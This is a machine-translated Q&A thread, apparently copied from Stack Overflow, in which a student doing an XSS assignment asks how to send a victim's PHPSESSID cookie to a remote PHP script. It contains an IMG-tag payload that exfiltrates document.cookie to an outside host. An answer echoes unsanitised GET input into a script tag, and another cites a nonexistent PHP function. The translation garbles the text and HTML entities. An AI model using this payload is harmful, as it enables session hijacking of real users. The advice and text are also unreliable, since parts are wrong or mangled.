Pass $ .variable в url

Я хотел бы передать переменную как ценность для веб-сайта. (Это назначение школы на XSS)

Например, я в настоящее время: $ .cookie ('echat') и $ .cookie ('PHPSESSID')

Я хотел бы передать его в ссылку сказать : xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID ')

Однако ничто не переходит к xxxx.com/xxx.php

any1 знать синтаксис, чтобы сделать это?

конкретно я размещения IMG тег, как это использовать:

& л IMG SRC = 'http://xxxxx.com/xxxxx.php?cookie=' + document.cookie & GT

По-видимому, document.cookie не работает, и мне нужно $ .cookie ('PHPSESSID'), чтобы получить PHPID

источник

2014-04-18 chj

Вы используете '.' в вашем имени переменной? – iamsleepy

@iamsleepy Это выглядит как код jQuery. – ceejayoz

Я пытаюсь использовать людей "посадил" ошибку и столкнулся с этой проблемой. – chj

Ваш URL-адрес устанавливает значение $_GET['cookie'] в $.cookie('PHPSESSID') в вашем скрипте PHP, не более того. Как это обрабатывается до PHP.

Поскольку это похоже на JavaScript (в частности, плагин jQuery Cookie), вы могли бы сделать echo "<script>{$_GET['cookie']}</script>"; на своем PHP, чтобы выплюнуть его как JS на результирующей странице. Как вы, надеюсь, знаете из своих классов, слепо используя данные, представленные пользователем, это опасная и плохая идея.

источник

2014-04-18 21:27:46 ceejayoz

Я не мог этого сделать, потому что эксплойт должен выполняться в URL-адресе. и тег скрипта santize – chj

-1

использовать этот PHP функция

url_encode("string")

, такие как

http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>

источник

2014-04-18 21:33:48

Pass $ .variable в url

ответ

Смежные вопросы